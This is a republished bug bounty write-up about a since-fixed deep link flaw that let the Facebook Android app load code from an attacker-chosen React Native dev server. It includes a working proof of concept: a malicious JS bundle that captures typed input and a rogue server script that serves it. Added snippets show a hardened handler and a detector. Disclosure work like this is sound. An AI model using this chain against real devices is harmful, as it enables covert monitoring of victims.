2025-01-23 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
Many beginners are unclear about how deep links can be used to turn the Facebook APP into a backdoor. To help with that, the editor explains it in detail below; anyone who needs this is welcome to read on and hopefully take something away.
Recently, the author discovered a deep link vulnerability in the Facebook Android APP that can be used to turn the Facebook APP installed on a user's phone into a backdoor program. The vulnerability can also be exploited by repackaging the Facebook APP and sending it to a specific target victim for installation. Let's look at how the author discovered the vulnerability and how, by constructing a payload, it became a real security hazard in Facebook APP's production build.
Vulnerability discovery
Usually, when I do public (bug bounty) testing, I first study the target's application mechanism carefully. In my previous blog post I shared some experience in discovering deep links (deeplinks) in FB4A by parsing the Facebook APP; here I first share a script I wrote that automates the discovery of Facebook APP deep links. The script, Facebook Android Deeplink Scraper (FBLinkBuilder.py), is a Python program that extracts deep links from the Facebook APK:
```python
import json
import argparse
from zipfile import ZipFile
from datetime import datetime

fname = datetime.now().strftime("FB_Deeplinks%d%m%Y%H%M%S.txt")  # default filename
parser = argparse.ArgumentParser()
parser.add_argument('-i', help='Facebook APK file', required=True)
parser.add_argument('-o', help='Output file', nargs='?', default=fname)
parser.add_argument('-e', help='Only show exported. Defaults to False', action='store_true')
args = parser.parse_args()
file_name = args.i      # apk
output_name = args.o    # generated output / provided
exported = args.e       # False / provided

with ZipFile(file_name, 'r') as apk:
    print('Extracting native routes file...')  # fyi
    data = apk.read('assets/react_native_routes.json')  # extract file from zip
js = json.loads(data.decode("utf-8"))  # list of route blocks
params = ''  # placeholder
i = 0        # deeplink count
with open(output_name, "w") as text_file:  # open output
    print('Manipulating data...')  # fyi
    for key in js:  # for each block in json
        for key2 in key['paramDefinitions']:  # grab the collection of params
            params += key2 + '=' + str(key['paramDefinitions'][key2]['type']).upper() + '&'  # append params with type
        if exported:  # exported only
            if key.get('access', '') != 'exported':  # check access key
                params = ''  # reset params
                continue     # try next block
        link = 'fb://' + key['path'] + '/?' + params  # build link
        print(link[:-1])  # fyi (drop the trailing '&' or '?')
        text_file.write(link[:-1] + '\n')  # write to file
        i += 1       # increase counter
        params = ''  # reset params
print('File: ' + output_name + ' saved')  # fyi
print(str(i) + ' deep links generated')  # fyi
```
Download source: https://github.com/ashleykinguk/FBLinkBuilder/
Usage: .\FBLinkBuilder.py -i fb0409.apk
By running FBLinkBuilder.py against different APP versions, we can compare their deep links and observe how the application's services change from version to version. It was with this method that I found an unsafe deep link in Facebook APP version 2020, fb://rnquantum_notification_handler/?address=, which was first added in that version.
The parameter of this deep link is a hostname or IP address, so I tested it with my own server 192.168.0.2: fb://rnquantum_notification_handler/?address=192.168.0.2:8224. Opening this link brings up the following dialog in Facebook APP:
After clicking the "Enable Quantum" button I restarted Facebook APP and looked for changes, but everything seemed normal. I then turned to the network traffic. I remembered the whitehat test feature that Facebook had recently opened to security researchers, which lets them temporarily bypass protections such as Facebook's certificate pinning in order to inspect the network traffic of Facebook's applications. Through the whitehat feature I found that, after the steps above, Facebook APP makes the following outgoing requests:
http://192.168.0.2:8224/message?device=Android+SDK+built+for+x86+-+10+-+API+29&app=com.facebook.katana&clientid=DevSupportManagerImpl
http://192.168.0.2:8224/status
The first request passes the mobile device's attributes to the host named in the address parameter and attempts to establish a WebSocket connection; the second asks that host for its status and expects the reply packager-status:running. Both are built into Facebook's React Native source, in the DevServerHelper class, which can be found on GitHub at /com/facebook/react/devsupport/DevServerHelper.java.
While I was constructing a response for this on my own server 192.168.0.2, I noticed another request from Facebook APP:
http://192.168.0.2:8224/RKJSModules/EntryPoints/Fb4aBundle.bundle?platform=android&dev=true&minify=false
This request fetches the bundle file containing the FB4A code, which the app expects in plain text rather than in the hbc* format normally used by Facebook APP. When I served an hbc*-format bundle as a test, Facebook APP crashed.
Before 2019, Facebook APP stored its bundles as plain files under the /assets/ directory; since 2019 Facebook has used the hbc format (Hermes ByteCode), both to reduce APK size and to keep the core code from being readable in clear text. I tried the hbc tool HBCdump to produce a plaintext bundle (about 250 MB) from Facebook APP, but that did not seem to work.
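The root cause above is that a production build accepts any host from the address parameter as its React Native packager. The following is an added example (not Facebook's code) that contrasts that accepting behaviour with a hardened handler for the same deep link; the function names and the debug_build flag are assumptions for illustration.

```python
from urllib.parse import urlparse, parse_qs
import ipaddress

# Deep link observed on the page; the host part selects the handler inside the app.
DEEPLINK_HOST = "rnquantum_notification_handler"


def dev_server_address(link):
    """Return the 'address' parameter of the deep link, or None if it is another link."""
    u = urlparse(link)
    if u.scheme != "fb" or u.netloc != DEEPLINK_HOST:
        return None
    return parse_qs(u.query).get("address", [None])[0]


def vulnerable_handler(link):
    # Behaviour described on the page: whatever address the link carries becomes the
    # packager the production app connects to once "Enable Quantum" is pressed.
    return dev_server_address(link)


def hardened_handler(link, debug_build):
    # A switch to a dev server should not exist in release builds at all ...
    if not debug_build:
        return None
    addr = dev_server_address(link)
    if addr is None:
        return None
    # ... and even in debug builds only a loopback packager on an explicit port is accepted.
    host, sep, port = addr.rpartition(":")
    if not sep or not port.isdigit() or not 1 <= int(port) <= 65535:
        return None
    try:
        ip = ipaddress.ip_address(host.strip("[]"))  # hostnames are rejected outright
    except ValueError:
        return None
    return addr if ip.is_loopback else None
```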
Hijack Facebook APP
After that, I thought of another way to obtain a usable bundle: take an old version of Facebook APP, whose bundle is still plaintext, and compare its contents with the error messages the device produces, which are visible through logcat. After comparing them, I found the following clues:
- __fbBatchedBridge: an object the bundle must define; it holds the functional components synchronised with the APP
- __fbBatchedBridge.callFunctionReturnFlushedQueue: a function called by the APP's native side; each call executes the corresponding action or event
Based on these findings, my idea was to get Facebook APP to download and execute a bundle file I had constructed. To do this, I needed to write my own bundle and host it on my own server 192.168.0.2. The following is the bundle file FB4abundle.js I constructed:
```javascript
/* contact@ash-king.co.uk */
var i = 0, logs = '';  /* our local vars */
/* the below objects are required for the app to execute the bundle. See __callFunction for the custom js */
var __fbBatchedBridge = {
    _lazyCallableModules: {},
    _queue: [[], 0],
    _callID: 0,
    _lastFlush: 0,
    _eventLoopStartTime: Date.now(),
    _immediatesCallback: null,
    callFunctionReturnFlushedQueue: function (module, method, args) {
        __fbBatchedBridge.__guard(function () {
            __fbBatchedBridge.__callFunction(module, method, args);
        });
        return __fbBatchedBridge.flushedQueue();
    },
    callFunctionReturnResultAndFlushedQueue: function (module, method, args) {
        __fbBatchedBridge.__guard(function () {
            throw new Error('callFunctionReturnResultAndFlushedQueue:' + module);
        });
        return __fbBatchedBridge.flushedQueue();
    },
    invokeCallbackAndReturnFlushedQueue: function (cbID, args) {
        throw new Error('invokeCallbackAndReturnFlushedQueue:' + cbID);
    },
    flushedQueue: function (a, b) {
        if (a != undefined) {
            throw new Error('flushedQueue:' + b);
        }
        __fbBatchedBridge.__callImmediates();
        const queue = __fbBatchedBridge._queue;
        __fbBatchedBridge._queue = [[], __fbBatchedBridge._callID];
        return queue[0].length ? queue : null;
    },
    onComplete: function (a) {
        throw new Error(a);
    },
    __callImmediates: function () {
        if (__fbBatchedBridge._immediatesCallback != null) {
            __fbBatchedBridge._immediatesCallback();
            throw new Error('processCallbacks:' + __fbBatchedBridge._immediatesCallback());
        }
    },
    getCallableModule: function (a) {
        const getValue = __fbBatchedBridge._lazyCallableModules[a];
        return getValue ? getValue() : null;
    },
    __callFunction: function (a, b, c) {
        if (a == 'RCTNativeAppEventEmitter') {  // Only capturing the search bar in settings
            i += 1;                               // increment count
            logs += JSON.stringify(c) + '\n';     // JSON Object
            if (i > 10) {
                /* Here is where we will write out to logcat via js */
                var t = (nativeModuleProxy);
                throw new Error('Look HERE:' + (logs) + '\n\r');
            }
        }
        __fbBatchedBridge._lastFlush = Date.now();
        __fbBatchedBridge._eventLoopStartTime = __fbBatchedBridge._lastFlush;
        const moduleMethods = __fbBatchedBridge.getCallableModule(a);
        try {
            moduleMethods[b].apply(moduleMethods, c);
        } catch (e) {}
        return -1;
    },
    __guard: function (e) {
        try {
            e();
        } catch (error) {
            throw new Error('__guard:' + error);
        }
    }
};
```
For Facebook APP to fetch the bundle automatically, I needed another script, fb_server.py, which answers the three requests shown above:
```python
# contact@ash-king.co.uk
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging


class S(BaseHTTPRequestHandler):
    def _set_response(self):
        self.send_response(500)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write(bytes("", "utf-8"))

    def do_GET(self):
        if self.path == '/status':
            self.resp_status()
        elif str(self.path).find('message?device=') > -1:
            self.resp_message()
        elif str(self.path).find('Fb4aBundle.bundle') > -1:
            self.resp_fb4a()
        else:
            self.send_error(404)  # anything else gets an explicit answer instead of hanging

    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n",
                     str(self.path), str(self.headers), post_data.decode('utf-8'))
        self._set_response()
        self.wfile.write("POST request for {}".format(self.path).encode('utf-8'))

    def resp_message(self):
        # /message?device=... : the app announces itself; an empty body is enough
        logging.info("resp_message")
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write(bytes("", "utf-8"))
        logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))

    def resp_status(self):
        # /status : the app expects the packager's liveness string
        logging.info("resp_status")
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write(bytes("packager-status:running", "utf-8"))
        logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))

    def resp_fb4a(self):
        # Fb4aBundle.bundle : serve the constructed plaintext bundle
        logging.info("resp_bundle")
        self.send_response(200)
        self.send_header('Content-type', 'multipart/mixed')
        self.end_headers()
        with open('FB4abundle.js', 'rb') as file:
            self.wfile.write(file.read())
        logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))


def run(server_class=HTTPServer, handler_class=S, port=8224):
    logging.basicConfig(level=logging.INFO)
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    logging.info('Starting httpd...\n')
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    logging.info('Stopping httpd...\n')


if __name__ == '__main__':
    run()
```
By combining the deep link, the bundle download and my own "Enable Quantum" server, I can finally inject my code into the bundle that Facebook APP loads and have it executed via the deep link. In my PoC demonstration, once the victim runs the repackaged Facebook APP, I can capture the characters typed into it: for example, the five characters "testi" entered by the victim are recorded in the log file, and finally an alert is raised:
Vulnerability impact
An attacker with physical access to the device, or who sends the victim a repackaged APP, can exploit this vulnerability to implant a persistent connection in the victim's Facebook APP, forming a backdoor that monitors the victim's APP over the long term.
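From a defender's side, the three requests listed earlier are a usable signal: a release build of a React Native app should never ask a remote host for packager status or a dev=true bundle. The following added example (not from the original post) runs that detection over a few constructed proxy log lines in an assumed "package method URL" format; the endpoint patterns are those shown on the page.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample of proxy log lines (app package, method, URL); not captured from a real device.
SAMPLE_LOG = """\
com.facebook.katana GET http://192.168.0.2:8224/message?device=Android+SDK+built+for+x86+-+10+-+API+29&app=com.facebook.katana&clientid=DevSupportManagerImpl
com.facebook.katana GET http://192.168.0.2:8224/status
com.facebook.katana GET http://192.168.0.2:8224/RKJSModules/EntryPoints/Fb4aBundle.bundle?platform=android&dev=true&minify=false
com.facebook.katana GET https://graph.facebook.com/v8.0/me
com.example.devapp GET http://10.0.2.2:8081/index.bundle?platform=android&dev=true&minify=false
"""

LINE_RE = re.compile(r"^(?P<app>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")


def classify(url):
    """Map a request URL to one of the React Native dev-server endpoints seen on the page."""
    u = urlparse(url)
    q = parse_qs(u.query)
    if u.path == "/status":
        return "status"
    if u.path == "/message" and q.get("clientid") == ["DevSupportManagerImpl"]:
        return "devsupport_message"
    if u.path.endswith(".bundle") and q.get("dev") == ["true"]:
        return "dev_bundle"
    return None


def find_dev_server_hijack(log_text, debug_apps=()):
    """Flag (app, host) pairs where a non-debug app talks to a dev server.

    A dev=true bundle download alone is enough; otherwise the status probe and the
    DevSupportManagerImpl announcement must both be present to cut down false positives.
    """
    seen = defaultdict(set)  # (app, host) -> endpoint kinds observed
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        kind = classify(m["url"])
        if kind:
            seen[(m["app"], urlparse(m["url"]).netloc)].add(kind)
    findings = []
    for (app, host), kinds in sorted(seen.items()):
        if app in debug_apps:
            continue  # known development builds are expected to do this
        if "dev_bundle" in kinds or {"status", "devsupport_message"} <= kinds:
            findings.append({"app": app, "dev_server": host, "evidence": sorted(kinds)})
    return findings
```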
At first, however, the Facebook security team dismissed the vulnerability, closing the report and classifying it as not applicable with the following explanation:
Any user that is knowledgeable enough to manage servers and write code would also be able to control how the app operates. That is also true for any browser extension or manual app created. A user is also able to proxy all their HTTP Traffic to manipulate those requests. Only being able to make local modifications with a PoC showing actual impact does not fully qualify for the Bug Bounty.
After that, I published the PoC video, and an hour later members of the Facebook security team contacted me to say they had reassessed the vulnerability and asked me to delete the video. At least 30 people had watched it before it was taken down.
Vulnerability assessment of Facebook security team
"After re-evaluating the vulnerability, we decided to reward the vulnerability according to our public testing standards. In the vulnerability you reported, you described the scenario in which the victim can be redirected to an attacker-controlled React Native Development server and insert malicious code into the victim's APP. Thank you for reporting the vulnerability."
Vulnerability reporting and handling process
2020.6.20 - Vulnerability reported
2020.6.22 - Technical details provided
2020.6.23 - Facebook classifies the vulnerability as N/A (not applicable)
2020.6.23 - I post the PoC video on YouTube
2020.6.23 - Facebook re-evaluates the vulnerability and asks me to delete the PoC video
2020.6.24 - Vulnerability triaged
2020.6.26 - Facebook mitigates by turning off the Quantum function
2020.8.20 - Facebook fixes the vulnerability
2020.9.17 - Facebook pays the bounty